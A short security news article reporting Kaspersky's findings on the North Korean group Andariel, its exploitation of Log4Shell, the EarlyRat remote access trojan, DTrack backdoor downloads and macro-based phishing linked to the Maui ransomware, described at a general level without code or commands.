Last year, the North Korean hacking group Andariel utilized a previously undisclosed malware named EarlyRat to carry out attacks exploiting the Log4j Log4Shell vulnerability.
Lazarus-Backed Andariel Group Exploits Log4j
During their investigation into the group’s operations from March to June 2022, Kaspersky researchers unexpectedly came across a previously unknown malware family.
Kaspersky said the advanced persistent threat group Andariel operated for over a decade within Lazarus Group.
Researchers characterized the new RAT as “simple” yet effective. It’s fundamental capabilities include command execution and system data collection.
During a separate investigation, Kaspersky researchers uncovered Andariel’s campaign and subsequently delved deeper into the matter. Their findings revealed that Andariel initiates infections by exploiting Log4j, ultimately downloading additional malware from a command-and-control (C2) server. Notably, the researchers observed the execution of commands by a human operator, who displayed numerous errors and typos, suggesting the involvement of an inexperienced individual in the operation.
Like many other remote access Trojans, EarlyRat collects system information upon activation and transmits it to the C2 server using a specific template. The transmitted data includes unique machine identifiers and queries that are encrypted using cryptographic keys specified in the ID field.
When executing the Log4j exploit, the malware downloads resources from the command-and-control server and ultimately downloads the DTrack backdoor.
In phishing attacks, malicious documents come with disabled macros. Once they have been enabled, a command is executed and the VBA code pings a server associated with the HolyGhost/Maui ransomware campaign.
Kaspersky noted that although Lazarus is categorized as an advanced persistent threat (APT) group, it deviates from the norm by engaging in typical cybercrime activities, including ransomware deployment.
Follow Us on: Twitter, Instagram, Facebook to get the latest security news!
Leave A Comment